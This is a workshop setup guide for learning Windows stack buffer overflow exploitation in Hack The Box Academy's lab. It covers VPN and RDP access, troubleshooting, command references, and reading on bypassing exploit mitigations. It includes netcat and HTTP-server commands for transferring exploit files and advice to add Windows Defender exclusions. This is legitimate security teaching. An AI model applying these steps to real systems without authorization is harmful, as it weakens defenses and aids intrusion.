CSEC Windows Exploitation Workshop

A hands-on introduction to Windows buffer overflow exploitation using Hack The Box Academy.

Prerequisites

• Computer with 4GB+ RAM
• Web browser
• VPN client (OpenVPN or built-in OS support)
• Basic understanding of memory and assembly concepts
• Linux/macOS/Windows host system for VPN connection

Workshop Structure

This workshop uses Hack The Box Academy's Stack-Based Buffer Overflows on Windows x86 module to learn Windows exploitation fundamentals. You'll learn stack buffer overflows, debugging techniques, and exploit development basics.

Important Note: While the module demonstrates x64dbg, consider that WinDbg is often required for more advanced Windows exploitation scenarios, especially kernel debugging and analyzing modern protections. Learning a new debugger is time-consuming and frustrating, so stick with x64dbg for this workshop if you want to and explore WinDbg later in case you wish to go deeper into Windows exploitation.

---

Part 1: Hack The Box Account Setup

Step 1: Check Your HTB Account Status

If you have an existing HTB account:

1. Log in to HTB Academy
2. Check your cube balance (top-left corner)

If you have sufficient cubes: Skip to completing the module

If you need cubes or don't have an account: Continue to Step 2

Step 2: Register/Get Cubes

Register using the referral link to receive cubes:

https://referral.hackthebox.com/mzIhnQt

Registration process:

1. Click the referral link above
2. Create account with email/username
3. Verify your email
4. Complete the onboarding tutorial

---

Part 2: VPN Setup

Understanding HTB VPN

HTB uses isolated lab environments accessed via VPN. Each module provides a VPN configuration file for secure access to target machines.

Step 1: Access the Module

Navigate to: https://academy.hackthebox.com/module/details/89

Start the module (read the introduction first!) and spawn the target machine when ready.

Step 2: Download VPN Configuration

Note: You can skip this step if using Pwnbox, but I recommend learning the VPN setup for future exercises.

1. Click "VPN Servers" in the module interface
2. Select a server (e.g., "US Academy 3")
3. Download the .ovpn configuration file
4. Save it to a known location

Step 3: Connect to VPN

Linux:

# Install OpenVPN if needed
sudo apt update
sudo apt install openvpn

# Connect to HTB VPN
sudo openvpn academy-lab_[username].ovpn

macOS:

# Install OpenVPN via Homebrew
brew install openvpn

# Connect to HTB VPN
sudo openvpn --config academy-lab_[username].ovpn

Windows (OpenVPN GUI):

1. Download OpenVPN GUI from OpenVPN Community Downloads
2. Install and run OpenVPN GUI
3. Import the .ovpn file (drag to system tray icon)
4. Right-click tray icon → Connect

Verify Connection:

# Check if you can reach HTB network
ping 10.10.10.1

# Check your VPN IP
ip addr show tun0  # Linux/macOS
ipconfig           # Windows

---

Part 3: Accessing the Windows Target

Connect to Windows VM

Once VPN is connected and target is spawned:

# Get target IP from HTB platform (shown after spawning)
TARGET_IP=<target_ip_from_htb>

# Connect via RDP from Linux
xfreerdp /v:$TARGET_IP /u:htb-student /p:<password_from_htb>

# Alternative with better graphics
xfreerdp /v:$TARGET_IP /u:htb-student /p:<password> /w:1920 /h:1080 /cert-ignore

# From Windows (Run dialog: Win+R)
mstsc /v:<target_ip>

# From macOS (using Microsoft Remote Desktop from App Store) 
# Add PC → PC Name: <target_ip> → User: htb-student
# (or just use Pwnbox)

Connection Issues:

• Ensure VPN is connected: ping <target_ip>
• Try different RDP clients if one fails
• Check firewall isn't blocking RDP (port 3389)
• Verify credentials from HTB platform

---

Part 4: Workshop Exercises

Follow the HTB Academy module sections in order.

---

Common Issues & Solutions

VPN Connection Problems

# Kill existing OpenVPN connections
sudo killall openvpn

# Try TCP connection instead of UDP
# Edit .ovpn file, change:
# proto udp → proto tcp
# remote <server> 1337 → remote <server> 443

# Check routing table
ip route
route -n  # Alternative

RDP Connection Failed

# Test connectivity first
ping <target_ip>
nmap -p 3389 <target_ip>

# Try legacy RDP security
xfreerdp /v:<ip> /u:htb-student /p:<pass> /sec:rdp

# Ignore certificate warnings
xfreerdp /v:<ip> /u:htb-student /p:<pass> /cert-ignore

x64dbg Crashes

# Run as Administrator
# Right-click x32dbg.exe → Run as Administrator

# Disable Windows Defender for testing folder
# Windows Security → Virus & threat protection → Exclusions
# Add folder: C:\Users\htb-student\Desktop\

---

Linux Commands Reference

Essential Commands for the Workshop

# Network Testing
ping <ip>                    # Test connectivity
traceroute <ip>             # Trace network path
netstat -an                 # Show network connections
ss -tulpn                   # Show listening ports

# File Transfer to Windows
# Python HTTP server (from exploit directory)
python3 -m http.server 8080
# On Windows: http://<your_ip>:8080/exploit.py

# Using netcat
nc -lvnp 4444 < exploit.py  # Send file
nc <ip> 4444 > exploit.py    # Receive file

# Process Monitoring
ps aux | grep openvpn       # Check VPN process
pgrep -f academy           # Find HTB processes

# Permissions
chmod +x exploit.py         # Make executable
sudo command               # Run with privileges

---

Module Progression Tips

1. Don't rush: Each concept builds on the previous
2. Take notes: Document EIP offsets, bad characters, and addresses
3. Consider WinDbg: While the module uses x64dbg, learning WinDbg will be more valuable for modern exploitation

---

Disclaimer

Educational Purpose: This workshop teaches security testing techniques for authorized environments only. Use these skills exclusively on systems you own or have explicit written permission to test.

Legal Responsibility: You are solely responsible for your actions. The instructor and organizers accept no responsibility for:

• Unauthorized access to systems
• Data loss or system damage
• Legal consequences of misuse
• Any malicious use of techniques learned

Ethical Guidelines:

• Never test systems without explicit authorization
• Report vulnerabilities responsibly
• Respect privacy and confidentiality
• Use knowledge to improve security, not exploit it

By participating, you acknowledge understanding these terms and agree to use this knowledge ethically and legally.

---

Additional Resources

Basic

• Intro to Assembly Language - HTB Academy module
• Windows Fundamentals - HTB Academy module
• Getting Started with WinDbg - Microsoft official guide
• WinDbg Quick Start - Community guide
• Debuggers 1011: Introductory WinDbg - OpenSecurityTraining2
• Debuggers 1101: Introductory IDA - OpenSecurityTraining2
• Debuggers 2011: Intermediate WinDbg - OpenSecurityTraining2
• Architecture 1001: x86-64 Assembly - OpenSecurityTraining2
• Windows Security Internals Book by James Forshaw

Advanced

• Debuggers 3011: Advanced WinDbg - OpenSecurityTraining2
• Architecture 2821: Windows Kernel Internals 2 - OpenSecurityTraining2
• Exploitation 4011: Windows Kernel Exploitation - Race Condition + UAF in KTM
• Windows Kernel Telemetry & Detection Techniques - HTB Academy module
• Predictable Paths: Novel ASLR Bypass Methods - IEEE paper
• Bypassing DEP with ROP - Practical guide
• Four Different Tricks to Bypass StackShield and StackGuard - Academic paper
• A Fresh Look at the Buffer Overflow Problem - Bypassing SafeSEH - Research paper
• Bypassing SEHOP - Technical guide

---

Author: Sasha Zyuzin

Good luck! 🎯